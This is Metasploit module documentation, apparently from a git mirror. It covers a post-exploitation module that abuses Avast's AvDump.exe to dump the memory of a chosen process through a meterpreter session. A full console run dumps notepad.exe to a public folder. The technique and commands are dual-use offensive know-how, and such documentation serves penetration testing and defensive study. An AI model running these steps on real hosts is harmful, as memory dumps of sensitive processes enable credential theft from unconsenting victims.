adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/post/windows/gather/avast_memory_dump.md
T
Jared Stroud c5222bead9 adding blog as further references
2020-11-21 22:24:35 -05:00

3.0 KiB
Raw Blame History

Vulnerable Application - Avast Home Security Suite - Avdump.exe

The Avast Home Security suite ships with a memory dumping utility that can be leveraged to dump process memory of user defined processes to user defined locations.

A detailed write up can be found at https://archcloudlabs.com/projects/dumping-memory-with-av/

Verification Steps

Verify that the path C:\\Program Files\\Avast Software Avast\\AvDump.exe exists.

  1. Start msfconsole
  2. Get meterpreter session
  3. Do: use post/windows/gather/avast_memory_dump
  4. Do: set SESSION <session id>
  5. Do: set DUMP_PATH <specify path dest>
  6. Do: set PID <pid>
  7. Do: run

Options

PID Specify the PID of the process you would like to dump.

DUMP_PATH Specify the location to write the memory dump to.

Scenarios

Windows 10 (2004 OS Build 19041.572)

msf5 > search avast

Matching Modules
================

   #  Name                                   Disclosure Date  Rank    Check  Description
   -  ----                                   ---------------  ----    -----  -----------
   0  post/windows/gather/avast_memory_dump                   normal  No     Avast AV Memory Dumping Utility


msf5 > use 0

msf5 post(windows/gather/avast_memory_dump) > sessions -C 'ps -N notepad.exe'
[*] Running 'ps -N notepad.exe' on meterpreter session 4 (192.168.218.131)
Filtering on 'notepad.exe'

Process List
============

 PID   PPID  Name         Arch  Session  User                  Path
 ---   ----  ----         ----  -------  ----                  ----
 8504  1812  notepad.exe  x64   1        DESKTOP-CD2VHVO\user  C:\Windows\System32\notepad.exe

msf5 post(windows/gather/avast_memory_dump) > show options

Module options (post/windows/gather/avast_memory_dump):

   Name       Current Setting           Required  Description
   ----       ---------------           --------  -----------
   DUMP_PATH  C:\Users\Public\test.dmp  yes       specify location to write dump file to
   PID        8504                      yes       specify pid to dump
   SESSION    4                         yes       The session to run this module on.
   
msf5 post(windows/gather/avast_memory_dump) > set PID 8504
PID => 8504

msf5 post(windows/gather/avast_memory_dump) > set SESSION 4
SESSION => 4

msf5 post(windows/gather/avast_memory_dump) > run

[*] [2020.10.21-22:49:24] AvDump.exe exists!
[*] [2020.10.21-22:49:24] executing Avast mem dump utility against 8504 to C:\Users\Public\test.dmp
[*] [2020.10.21-22:49:29] [2020-10-22 02:49:26.969] [info   ] [dump       ] [ 1400: 8032] Dumpmaster is arming.
[2020-10-22 02:49:27.047] [info   ] [dump       ] [ 1400: 8032] Successfully dumped process 8504 into 'C:\Users\Public\test.dmp'
[2020-10-22 02:49:27.047] [info   ] [log_module ] [ 1400: 8032] LogModule is going to be destroyed.
[2020-10-22 02:49:27.047] [info   ] [log_module ] [ 1400: 8032] =====================================================================================================================
[*] Post module execution completed
Reference in New Issue View Git Blame Copy Permalink